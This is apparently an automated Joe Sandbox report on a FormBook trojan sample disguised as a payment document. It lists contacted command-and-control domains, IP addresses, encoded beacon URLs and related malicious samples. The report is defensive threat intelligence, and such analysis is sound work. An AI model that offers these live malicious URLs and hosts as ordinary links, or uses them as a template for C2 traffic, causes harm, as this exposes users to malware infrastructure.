            NameIPActiveMaliciousAntivirus DetectionReputation
            fortunetravelsltd.com
            		103.210.56.141
            		truetrue
              		unknown
              belaflorloja.online
              		162.240.81.18
              		truetrue
                		unknown
                cjjmobbbshhhu.shop
                		84.32.84.32
                		truetrue
                  		unknown
                  www.greenharbor.info
                  		69.57.161.215
                  		truetrue
                    		unknown
                    porousworld.com
                    		173.231.241.132
                    		truetrue
                      		unknown
                      hmoatl.com
                      		144.217.103.3
                      		truetrue
                        		unknown
                        www.lets-room.online
                        		194.58.112.174
                        		truetrue
                          		unknown
                          www.medical-loan24.live
                          		64.190.62.22
                          		truetrue
                            		unknown
                            ozzventures.shop
                            		84.32.84.32
                            		truetrue
                              		unknown
                              speedbikesglobal.com
                              		207.244.126.150
                              		truetrue
                                		unknown
                                blessingstation.org
                                		68.178.195.71
                                		truetrue
                                  		unknown
                                  www.633922.com
                                  		103.120.80.111
                                  		truefalse
                                    		unknown
                                    sorenad.com
                                    		217.144.107.2
                                    		truetrue
                                      		unknown
                                      www.hillcresthealth.online
                                      		208.91.197.27
                                      		truetrue
                                        		unknown
                                        www.zbbqis.store
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.porousworld.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.sorenad.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.belaflorloja.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.ozzventures.shop
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.hmoatl.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.blessingstation.org
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.hcfa-cis.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.fortunetravelsltd.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.cjjmobbbshhhu.shop
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.speedbikesglobal.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.belaflorloja.online/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.sorenad.com/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.lets-room.online/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.hmoatl.com/m858/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.porousworld.com/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.blessingstation.org/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pXDVrMpxqlwTFbA==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.speedbikesglobal.com/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.633922.com/m858/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.cjjmobbbshhhu.shop/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.cjjmobbbshhhu.shop/m858/?nRRpS=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYtzUoBAQbExEboA==&w6i=ADXH7n8hwvbLKF6true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.ozzventures.shop/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB069nu2XDEJbhHAtQ==true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.hillcresthealth.online/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWoycotxYusBU4lA==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.greenharbor.info/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dNPSr5MT6J+IM8w==true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.medical-loan24.live/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.fortunetravelsltd.com/m858/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.greenharbor.info/m858/?nRRpS=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePzt1TzPXk8Fubw2qA==&w6i=ADXH7n8hwvbLKF6true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.hillcresthealth.online/m858/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.blessingstation.org/m858/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hmoatl.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPEHAIn6yNHix56w==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.speedbikesglobal.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag==true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.belaflorloja.online/m858/?nRRpS=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsKbvkZ0uY+Z5mQ==&w6i=ADXH7n8hwvbLKF6true
                                                              • Avira URL Cloud: malware
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://duckduckgo.com/chrome_newtabtypeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://reg.rutypeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.reg.ru/web-sites/website-builder/?utm_source=www.lets-room.online&utm_medium=parking&utmtypeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://porousworld.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6jtypeperf.exe, 00000006.00000002.3840171693.0000000003A0A000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vdtypeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://img.sedoparking.comtypeperf.exe, 00000006.00000002.3840171693.00000000041E4000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.00000000037F4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://rytrk.com/track.typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://www.reg.ru/dedicated/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_landtypeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.633922.commNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3841079742.0000000004CC6000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://nginx.net/typeperf.exe, 00000006.00000002.3840171693.0000000004508000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003B18000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://fedoraproject.org/typeperf.exe, 00000006.00000002.3840171693.0000000004508000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003B18000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtypeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmDtypeperf.exe, 00000006.00000002.3840171693.0000000004052000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003662000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    http://fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxtypeperf.exe, 00000006.00000002.3840171693.0000000003878000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000002E88000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://www.reg.ru/web-sites/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_landtypeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://mozilla.org0/typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://crash-reports.mozilla.com/submit?id=typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotypeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.reg.ru/whois/?check=&dname=www.lets-room.online&amp;reg_source=parking_autotypeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://rytrk.comtypeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://www.networksolutions.com/typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://nsis.sf.net/NSIS_ErrorErrorPayment_Copy_[SWIFT_COPY].exefalse
                                                                                                  		high
                                                                                                  https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.ecosia.org/newtab/typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://parking.reg.ru/script/get_domain_data?domain_name=www.lets-room.online&rand=typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.reg.ru/hosting/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land_htypeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdftypeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.sedo.com/services/parking.php3typeperf.exe, 00000006.00000002.3840171693.00000000041E4000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.00000000037F4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://ac.ecosia.org/autocomplete?q=typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://nsis.sf.net/NSIS_ErrorPayment_Copy_[SWIFT_COPY].exefalse
                                                                                                                  		high
                                                                                                                  http://blessingstation.org/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBptypeperf.exe, 00000006.00000002.3840171693.000000000469A000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003CAA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://hillcresthealth.online/?ts=fE1vYmlsZUNsZWFuQmxhY2t8fDQ3OWMwfGJ1Y2tldDAwM3x8fHx8fDY1NzFiZTZiYjtypeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.reg.ru/domain/new/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_lantypeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		high

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      162.240.81.18
                                                                                                                      		belaflorloja.onlineUnited States
                                                                                                                      		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                      144.217.103.3
                                                                                                                      		hmoatl.comCanada
                                                                                                                      		16276OVHFRtrue
                                                                                                                      207.244.126.150
                                                                                                                      		speedbikesglobal.comUnited States
                                                                                                                      		30633LEASEWEB-USA-WDCUStrue
                                                                                                                      217.144.107.2
                                                                                                                      		sorenad.comIran (ISLAMIC Republic Of)
                                                                                                                      		204213NETMIHANIRtrue
                                                                                                                      84.32.84.32
                                                                                                                      		cjjmobbbshhhu.shopLithuania
                                                                                                                      		33922NTT-LT-ASLTtrue
                                                                                                                      208.91.197.27
                                                                                                                      		www.hillcresthealth.onlineVirgin Islands (BRITISH)
                                                                                                                      		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                      64.190.62.22
                                                                                                                      		www.medical-loan24.liveUnited States
                                                                                                                      		11696NBS11696UStrue
                                                                                                                      103.210.56.141
                                                                                                                      		fortunetravelsltd.comBangladesh
                                                                                                                      		135130ACN-AS-APMdWahidMuradTAAnikComputerNetworkingBDtrue
                                                                                                                      173.231.241.132
                                                                                                                      		porousworld.comUnited States
                                                                                                                      		54641INMOTI-1UStrue
                                                                                                                      69.57.161.215
                                                                                                                      		www.greenharbor.infoUnited States
                                                                                                                      		25653FORTRESSITXUStrue
                                                                                                                      68.178.195.71
                                                                                                                      		blessingstation.orgUnited States
                                                                                                                      		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                      103.120.80.111
                                                                                                                      		www.633922.comHong Kong
                                                                                                                      		139021WEST263GO-HKWest263InternationalLimitedHKfalse
                                                                                                                      194.58.112.174
                                                                                                                      		www.lets-room.onlineRussian Federation
                                                                                                                      		197695AS-REGRUtrue

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:38.0.0 Ammolite
                                                                                                                      Analysis ID:1355380
                                                                                                                      Start date and time:2023-12-07 13:41:05 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 10m 12s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:12
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:2
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@10/3@24/13
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 80%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 99%
                                                                                                                      • Number of executed functions: 138
                                                                                                                      • Number of non-executed functions: 214
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target mNtjNwEeCHVoSqPJEzBvhXy.exe, PID 6988 because it is empty
                                                                                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • VT rate limit hit for: Payment_Copy_[SWIFT_COPY].exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      13:42:47API Interceptor10977369x Sleep call for process: typeperf.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      162.240.81.18PIqLeJRHKnukIQd.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.belaflorloja.online/ch82/?z4rLYT=TiOFK1ZgJvBjOMHx/V0T7t5NzLjZN+Eik1VQD6rGaxWTvp1R1ahwPzeV2lbITta/koqER+yPuVa1OZDGM5sSozBQ8AW5HHSwsg==&9NUH=pzMx5JhPkV0psLc
                                                                                                                      Altogether.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • www.belaflorloja.online/nd9s/?zHa8ND=OaqTakngmcCzjTcwIIpU8p6lvkOusrTzk2gAZoE4JN1Gs9ZY+FFJPD63w94pQQrC5Ft79JAbgFCZHDE7sGXu+q5nojZlHSTnFg==&2hU0K=yRYTjpMPv
                                                                                                                      Plyshaar.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • www.belaflorloja.online/nd9s/?P2O0N=CDxxm0lHuJJP&Lp4tqNJ8=OaqTakngmcCzjTc0MYpR8pSnrwKurbTzk2gAZoE4JN1Gs9ZY+FFJPD63w94pQQrC5Ft79JAbgFCZHDE7sGXu/oQrgHlbFDLzBQ==
                                                                                                                      8319.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.belaflorloja.online/ch82/?KfAHy=qhgLGbzp7HV0QZ&P45tYhW8=TiOFK1ZgJvBjOMHyz1058qVou7euaMsik1VQD6rGaxWTvp1R1ahwPzeV2lbITta/koqER+yPuVa1OZDGM5spiU8J4yubQ0vatw==
                                                                                                                      Dialyseapparatet.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • www.belaflorloja.online/nd9s/?m6=BrVp4ZWPPLwpzri&z6=OaqTakngmcCzjTcwIIpU8p6lvkOusrTzk2gAZoE4JN1Gs9ZY+FFJPD63w94pQQrC5Ft79JAbgFCZHDE7sGXu+q5nojZlHSTnFg==
                                                                                                                      PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • www.alemdenos.online/cvps/?-Lkxp=FkhLYzbpQfibhqTEjVzl439fT5cPXoNkmo03mbVgFl266UBJuqwM/M2FODzSdAcXOer9KJhrZBSz/SXf0IyDx/3tgZSE5tipVQ==&ojQxW=_LZhZtRhEB2XP
                                                                                                                      yUpUHVpS0w.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.maquinazero.store/o6g2/?Ln70Y=hP3PY5P2/UVvRIzgtbFyaHnL8gc6lKf/+jFfuKshHDQO/YYscW97ZMqhHn2kqqwVvlbPzP3H2Q==&Yno=H2JxltV068mxXTqp
                                                                                                                      Q7ZiqgD1IZjP7fs.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.belaflorloja.online/8giq/?qjMxZz=+t5xVzlPrqqnBV9ZtRJY5Qb5FDF0DecJSoHktEKVW6MQZ29dmRq0jJYQRwBNXMFQSoHSv9D37sUeM8Qt61Q2atri/9Ly9zn9Sg==&-f0T=QzuL1faX_NV444j
                                                                                                                      Acknowledge_Letter.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • www.inovaebook.online/hcdq/?J6ex=TPpBnrlHjp7oqUUwWP4uPAudP8ECDd5zHIZVlBs9CPyINzXpvBB3k4Kl49OKAEEejwoXSTWpnbPZNrnimmc1mjdRWp2Oq8CaRQ==&rF_p=BFMhwTqxjJAp-L6P
                                                                                                                      Summon_From_SARS.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • www.inovaebook.online/hcdq/
                                                                                                                      qWmFFs9EQd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • www.belaflorloja.online/m858/?Ob=7ouShKyUNVA5Yjh5wktAVtT2zGTEyGBxZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsIv2qKcuY+Z9nA==&0DlPP=LVnH
                                                                                                                      Sars_Notification.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • www.inovaebook.online/hcdq/?3pTtkr=TPpBnrlHjp7oqUUwWP4uPAudP8ECDd5zHIZVlBs9CPyINzXpvBB3k4Kl49OKAEEejwoXSTWpnbPZNrnimmcwjidSVaO96vqzTA==&fh6p7=Otrxtr3xWpM
                                                                                                                      Shipping_documentsInvoice_and_Packing_List,_Certificate_of_Origin.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.belaflorloja.online/udwf/?Hxp8=oFFL3vu9XQAr7FXg9tLvaYbPlZ5L8Wn7HJzEKcO8nyy/m3ryRIKVTbJ4UDOYwgR5jk0ohOkqMmAoILSQFXP7fgXauyzakeZHyA==&QF=wfstZByp0vjPet
                                                                                                                      INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.alemdenos.online/cvps/?pf5=FkhLYzbpQfibhqTEjVzl439fT5cPXoNkmo03mbVgFl266UBJuqwM/M2FODzSdAcXOer9KJhrZBSz/SXf0IyDx/3tgZSE5tipVQ==&kDuhz=t6NP562HYH_
                                                                                                                      Mnp10GPUmthweWl.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.psiedithaguiar.online/cw88/?W0Ph22=HWW18yrCiVhSkE0NAjQIZzjUdyr2axjhwWhDLB4Nx1ta8ivjYzQ05WOv3dSX5++gMqQwwwOjuXoRvv9leLjfl5jezq4+oGq59g==&IH=JXiLf
                                                                                                                      Bank_receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.psiedithaguiar.online/cw88/?fNG46br=HWW18yrCiVhSkE0OMDRGfA79TWqFd2fhwWhDLB4Nx1ta8ivjYzQ05WOv3dSX5++gMqQwwwOjuXoRvv9leLjaveeHksUcukXX8w==&pbSp=EN5XenmHmjp
                                                                                                                      SOA_PAYMENT_OCTOBER_2023.exeGet hashmaliciousFormBookBrowse
